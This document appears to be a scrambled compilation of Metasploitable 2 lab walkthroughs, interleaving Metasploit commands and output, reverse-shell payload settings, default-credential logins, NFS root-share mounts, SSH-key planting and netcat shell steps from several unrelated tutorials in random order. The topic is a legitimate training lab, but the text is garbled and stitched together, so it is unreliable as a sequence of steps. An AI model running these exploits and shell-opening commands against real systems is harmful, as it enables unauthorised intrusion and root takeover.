[*] Command shell session 1 opened (192.168.127.159:4444 -> 192.168.127.154:46653) at 2021-02-06 22:23:23 +0300
Using default colormap which is TrueColor.
RHOST => 192.168.127.154
Currently missing is documentation on the web server and web application flaws as well as vulnerabilities that allow a local user to escalate to root privileges.
Please check out the Pentesting Lab section within our Part 1 article for further details on the setup.
msf exploit(usermap_script) > show options
Module options (exploit/multi/http/tomcat_mgr_deploy):
USERPASS_FILE /opt/metasploit/apps/pro/msf3/data/wordlists/postgres_default_userpass.txt no File containing (space-seperated) users and passwords, one pair per line
[*] Command shell session 2 opened (192.168.127.159:4444 -> 192.168.127.154:54381) at 2021-02-06 17:31:48 +0300
[*] Scanned 1 of 1 hosts (100% complete)
SRVPORT 8080 yes The local port to listen on.
[*] instance eval failed, trying to exploit syscall
Using this environment we will demonstrate a selection of exploits using a variety of tools from within Kali Linux against Metasploitable V2.
Setting the Security Level from 0 (completely insecure) through to 5 (secure). In this lab we learned how to perform reconnaissance on a target to discover potential system vulnerabilities.
[*] Command shell session 1 opened (192.168.127.159:4444 -> 192.168.127.154:52283) at 2021-02-06 21:34:46 +0300
RHOST => 192.168.127.154
Have you used Metasploitable to practice Penetration Testing? The compressed file is about 800 MB and can take a while to download over a slow connection.
If a username is sent that ends in the sequence :) [ a happy face ], the backdoored version will open a listening shell on port 6200.
Once Metasploitable 2 is up and running and you have the IP address (mine will be 10.0.0.22 for this walkthrough), then you want to start your scan.
[*] B: "VhuwDGXAoBmUMNcg\r\n"
---- --------------- -------- -----------
USERNAME => tomcat
For further details beyond what is covered within this article, please check out the Metasploitable 2 Exploitability Guide.
[*] udev pid: 2770
XSS via logged in user name and signature. The Setup/reset the DB menu item can be enabled by setting the uid value of the cookie to 1. DOM injection on the add-key error message because the key entered is output into the error message without being encoded. You can XSS the hints-enabled output in the menu because it takes input from the hints-enabled cookie value. You can SQL injection the UID cookie value because it is used to do a lookup. You can change your rank to admin by altering the UID value. HTTP Response Splitting via the logged in user name because it is used to create an HTTP Header. This page is responsible for cache-control but fails to do so. This page allows the X-Powered-By HTTP header. HTML comments. There are secret pages that if browsed to will redirect user to the phpinfo.php page.
Module options (auxiliary/scanner/telnet/telnet_version):
Much less subtle is the old standby "ingreslock" backdoor that is listening on port 1524.
---- --------------- -------- -----------
msf exploit(drb_remote_codeexec) > set payload cmd/unix/reverse
Metasploitable 2 is available at:
Name Current Setting Required Description
Pentesting Vulnerabilities in Metasploitable (part 2), VM version = Metasploitable 2, Ubuntu 64-bit.
[*] Reading from sockets
Proxies no Use a proxy chain
This set of articles discusses the RED TEAM's tools and routes of attack.
Matching Modules
Module options (auxiliary/scanner/postgres/postgres_login):
So we got a low-privilege account.
RPORT 23 yes The target port
VERBOSE true yes Whether to print output for all attempts
payload => linux/x86/meterpreter/reverse_tcp
In this series of articles we demonstrate how to discover & exploit some of the intentional vulnerabilities within the Metasploitable pentesting target.
---- --------------- -------- -----------
Compatible Payloads
For the final challenge you'll be conducting a short and simple vulnerability assessment of the Metasploitable 2 system, by launching your own vulnerability scans using Nessus, and reporting on the vulnerabilities and flaws that are discovered.
For more information on Metasploitable 2, check out this handy guide written by HD Moore.
A reinstall of Metasploit was next attempted: Following the reinstall the exploit was run against with the same settings: This seemed to be a partial success: a Command Shell session was generated and could be invoked via the sessions 1 command. Exploiting Samba Vulnerability on Metasploit 2. The screenshot below shows the results of running an Nmap scan on Metasploitable 2.
[*] Matching
---- --------------- -------- -----------
Exploit target:
This program makes it easy to scale large compiler jobs across a farm of like-configured systems. Relist the files & folders in time descending order showing the newly created file.
Note: Metasploitable comes with an early version of Mutillidae (v2.1.19) and reflects a rather outdated OWASP Top 10.
whoami
Below is a list of the tools and services that this course will teach you how to use.
msf exploit(java_rmi_server) > show options
Name Current Setting Required Description
So I'm going to exploit 7 different remote vulnerabilities; here is the list of vulnerabilities.
RHOST yes The target address
By Ed Moyle, Drake Software Nowhere is the adage "seeing is believing" more true than in cybersecurity. The following command line will scan all TCP ports on the Metasploitable 2 instance: Nearly every one of these listening services provides a remote entry point into the system.
msf exploit(drb_remote_codeexec) > set LHOST 192.168.127.159
A malicious backdoor that was introduced to the Unreal IRCD 3.2.8.1 download archive is exploited by this module.
msf exploit(unreal_ircd_3281_backdoor) > exploit
[*] Accepted the first client connection
[*] 192.168.127.154:445 is running Unix Samba 3.0.20-Debian (language: Unknown) (domain:WORKGROUP)
msf auxiliary(telnet_version) > set RHOSTS 192.168.127.154
We're going to use netcat to connect to the attacking machine and give it a shell: Listen on port 5555 on the attacker's machine: Now that all is set up, I just make the exploit executable on the victim machine and run it: Now, for the root shell, check our local netcat listener: A little bit of work on that one, but all the more satisfying!
whoami
---- --------------- -------- -----------
[*] Auxiliary module execution completed
msf > use exploit/multi/samba/usermap_script
The example below uses rpcinfo to identify NFS and showmount -e to determine that the "/" share (the root of the file system) is being exported. Metasploitable Databases: Exploiting MySQL with Metasploit: Metasploitable/MySQL. There was however an error generated, though this did not stop the ability to run commands on the server including ls -la above and more: Whilst we can consider this a success, repeating the exploit a few times resulted in the original error returned. The ++ signifies that all computers should be treated as friendlies and be allowed to .
Metasploitable 2
Among security researchers, Metasploitable 2 is the most commonly exploited online application. Distributed Ruby or DRb makes it possible for Ruby programs to communicate on the same device or over a network with each other. Step 2: Now extract the Metasploitable2.zip (downloaded virtual machine) into C:/Users/UserName/VirtualBox VMs/Metasploitable2.
Exploit target:
We can see a few insecure web applications by navigating to the web server root, along with the msfadmin account information that we got earlier via telnet.
This tutorial shows how to install it in Ubuntu Linux, how it works, and what you can do with this powerful security auditing tool. To make this step easier, both Nessus and Rapid7 NexPose scanners are used to locate potential vulnerabilities for each service. Here are the outcomes. Utilizing login / password combinations suggested by the USER_FILE, PASS_FILE and USERPASS_FILE options, this module tries to validate against a PostgreSQL instance.
msf exploit(java_rmi_server) > set RHOST 192.168.127.154
-- ----
rapid7/metasploitable3 Wiki.
---- --------------- -------- -----------
[*] Matching
msf exploit(twiki_history) > show options
[+] 192.168.127.154:5432 Postgres - Success: postgres:postgres (Database 'template1' succeeded.)
A list that may be useful to readers that are studying for a certification exam or, more simply, to those who just want to have fun! This can be done via brute forcing, SQL injection and XSS via referer HTTP header. SQL injection and XSS via user-agent string. Authentication bypass SQL injection via the username field and password field. SQL injection via the username field and password field. XSS via username field. JavaScript validation bypass. This page gives away the PHP server configuration. Application path disclosure. Platform path disclosure. Creates cookies but does not make them HTML only.
Id Name
Let's see if we can really connect without a password to the database as root.
[*] B: "ZeiYbclsufvu4LGM\r\n"
Depending on the order in which guest operating systems are started, the IP address of Metasploitable 2 will vary. CVE is a list of publicly disclosed cybersecurity vulnerabilities that is free to search, use, and incorporate into products and services, per the terms of use. What is Metasploit? This is a tool developed by Rapid7 for the purpose of developing and executing exploits against vulnerable systems.
[*] Successfully sent exploit request
[*] Started reverse double handler
A vulnerability in the history component of TWiki is exploited by this module. "Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, help web developers better understand the processes of securing web applications and aid teachers/students to teach/learn web application security in a class room environment."
msf exploit(usermap_script) > exploit
[*] Writing to socket A
The example below uses a Metasploit module to provide access to the root filesystem using an anonymous connection and a writeable share.
SRVPORT 8080 yes The local port to listen on.
msf exploit(tomcat_mgr_deploy) > set RHOST 192.168.127.154
meterpreter > background
Essentially this tests whether the root account has a weak SSH key, checking each key in the directory where you have stored the keys. To begin, Nessus wants us to input a range of IP addresses so that we can discover some targets to scan.
msf exploit(vsftpd_234_backdoor) > set RHOST 192.168.127.154
Module options (exploit/unix/ftp/vsftpd_234_backdoor):
[*] A is input
[*] Writing to socket A
[*] Reading from sockets
Loading of any arbitrary file including operating system files.
Id Name
DATABASE template1 yes The database to authenticate against
This document will continue to expand over time as many of the less obvious flaws with this platform are detailed.
Combining Nmap with Metasploit for a more detailed and in-depth scan on the client machine.
RHOST yes The target address
Next, you will get to see the following screen.
===================
[*] Reading from sockets
RPORT 139 yes The target port
whoami
This must be an address on the local machine or 0.0.0.0
An attacker can execute arbitrary OS commands by introducing a rev parameter that includes shell metacharacters to the TWikiUsers script.
RHOST yes The target address
[*] Command shell session 3 opened (192.168.127.159:4444 -> 192.168.127.154:41975) at 2021-02-06 23:31:44 +0300
Accessing it is easy: In addition to the malicious backdoors in the previous section, some services are almost backdoors by their very nature.
-- ----
At a minimum, the following weak system accounts are configured on the system. According to the most recent available information, this backdoor was added to the vsftpd-2.3.4.tar.gz archive between June 30, 2011, and July 1, 2011. Then we looked for an exploit in Metasploit, and fortunately, we got one: Distributed Ruby Send instance_eval/syscall Code Execution.
URIPATH no The URI to use for this exploit (default is random)
Once the VM is available on your desktop, open the device, and run it with VMWare Player.
-- ----
So, let's set it up:
mkdir /metafs # this will be the mount point
mount -t nfs 192.168.127.154:/ /metafs -o nolock # mount the remote shared directory as nfs and disable file locking
To build a new virtual machine, open VirtualBox and click the New button.
VM version = Metasploitable 2, Ubuntu 64-bit Kernel release = 2.6.24-16-server IP address = 10.0.2.4 Login = msfadmin/msfadmin NFS Service vulnerability First we need to list what services are visible on the target: Performing a port scan to discover the available services using the Network Mapper 'nmap'.
A command execution vulnerability in Samba versions 3.0.20 through 3.0.25rc3 is exploited by this module while using the non-default Username Map Script configuration option.
It is also instrumental in Intrusion Detection System signature development.
RPORT 80 yes The target port
We are interested in the Victim-Pi or 192.168.1.95 address because that is a Raspberry Pi and the target of our attack. Our attacking machine is the kali-server or 192.168.1.207 Raspberry Pi.
SESSION => 1
In this demonstration we are going to use the Metasploit Framework (MSF) on Kali Linux against the TWiki web app on Metasploitable.
tomcat55
msf > use exploit/linux/misc/drb_remote_codeexec
0 Automatic Target
SMBDomain WORKGROUP no The Windows domain to use for authentication
whoami
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
Between November 2009 and June 12, 2010, this backdoor was housed in the Unreal3.2.8.1.tar.gz archive. Our first attempt failed to create a session: The following commands to update Metasploit to v6.0.22-dev were tried to see if they would resolve the issue: Unfortunately the same problem occurred after the version upgrade which may have been down to the database needing to be re-initialized. Browsing to http://192.168.56.101/ shows the web application home page.
msf exploit(tomcat_mgr_deploy) > show option
[*] Meterpreter session, using get_processes to find netlink pid
[*] A is input
Searching for exploits for Java provided something intriguing: Java RMI Server Insecure Default Configuration Java Code Execution. The root directory is shared.
[*] Command: echo qcHh6jsH8rZghWdi;
Additionally, an ill-advised PHP information disclosure page can be found at http:///phpinfo.php.
For this walk-through I use the Metasploit framework to attempt to perform a penetration testing exercise on Metasploitable 2. Step 2: Basic Injection.
To do so (and because SSH is running), we will generate a new SSH key on our attacking system, mount the NFS export, and add our key to the root user account's authorized_keys file: On port 21, Metasploitable2 runs vsftpd, a popular FTP server.
msf auxiliary(smb_version) > run
eth0 Link encap:Ethernet HWaddr 00:0c:29:9a:52:c1
inet addr:192.168.99.131 Bcast:192.168.99.255 Mask:255.255.255.0
inet6 addr: fe80::20c:29ff:fe9a:52c1/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
root@ubuntu:~# nmap -p0-65535 192.168.99.131
Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-05-31 21:14 PDT
Last login: Fri Jun 1 00:10:39 EDT 2012 from :0.0 on pts/0
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686
root@ubuntu:~# showmount -e 192.168.99.131
RHOST 192.168.127.154 yes The target address
================
msf auxiliary(postgres_login) > run
---- --------------- -------- -----------
However, we figured out that we could use Metasploit against one of them in order to get a shell, so we're going to detail that here. Enter the required details on the next screen and click Connect.
[*] Command: echo f8rjvIDZRdKBtu0F;
Commands end with ; or \g. Step 11: Create a C file (as given below) and compile it, using GCC on a Kali machine.
The nmap scan shows that the port is open but tcpwrapped.
RMI method calls do not support or need any kind of authentication. This method is used to exploit VNC software hosted on Linux or Unix or Windows Operating Systems with authentication vulnerability.
RPORT 1099 yes The target port
Your public key has been saved in /root/.ssh/id_rsa.pub.
[*] Using URL:
msf > use exploit/unix/misc/distcc_exec
I thought about closing ports but I read it isn't possible without killing processes. To transfer commands and data between processes, DRb uses remote method invocation (RMI). We're 64 bit Kali, the target is 32 bit, so we compile it specifically for 32 bit: From the victim, we go to the /tmp/ directory and take the exploit from the attacking machine: Confirm that this is the right PID by looking at the udev service: It seems that it is the right one (2768-1 = 2767).